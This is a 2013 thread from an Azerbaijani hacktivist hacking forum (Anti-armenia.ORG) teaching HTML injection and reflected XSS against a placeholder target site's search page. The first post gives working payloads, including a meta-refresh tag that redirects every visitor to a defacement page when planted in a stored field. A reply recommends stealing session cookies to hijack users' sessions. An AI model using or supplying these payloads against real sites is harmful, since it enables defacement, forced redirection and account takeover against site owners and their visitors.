Anti-armenia.ORG - Forumlar - XSS html injection



Istifadəçi
     2013-03-03 22:49 GMT                 

TheLock


Gold
Mesaj Sayı : 412
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   18  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sayt belədir:
Kod:
http://www.hədəfsayt.com/axtar.php=
e]
Kodumuz:
Kod:
<h1>TheLock</h1>

Kod bu şəkildə artırılacaq:
Kod:
http://www.hədəfsayt.com/axtar.php=<h1>TheLock</h1>
e]
Qarşımıza böyük hərflərlə TheLock yazısının gəldiyini görəcəyik.Bu deməkdir ki burda html injection var.Bura meta ata bilərik.Atdığımız metanı DB-ya qeyd olmadığı üçün sadəcə biz görəcəyik.Amma rəy bildirmək üçün(və buna oxşar yəni db-ya qeyd olunan) hissə tapıb meta atsaq bura girən hərkəs indeximizə yönlənəcək.
Meta kodu:
Kod:
<meta http-equiv="refresh" content="0;URL=http://www.indexlisayt.com/hacked.html">

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-04 11:38 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


http://www.hədəfsayt.com/axtar.php=
Parametrləri göstərməmisən.
Misal üçün belə daha realdır:

http://www.hədəfsayt.com/axtar.php?page=XSS PAYLOAD




Bir də xahiş edirəm mümkünsə o vulnerable skriptləri də ver ki, baxan daha aydın başa düşsün vuln hardadır və nəyin hesabına yaranır.
Və ən sonda bu non-persistent XSS-dir.Yəniki daimi deyil.Əsas index basmaq deyil bu kimi vulnlarda,əsas session hijack etməkdir.
Yəni cookieni/session cookie-lərini oğurlayıb həmin sessiya ilə attackerin remote sayta access almasıdır.

Ana VƏTƏN!
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG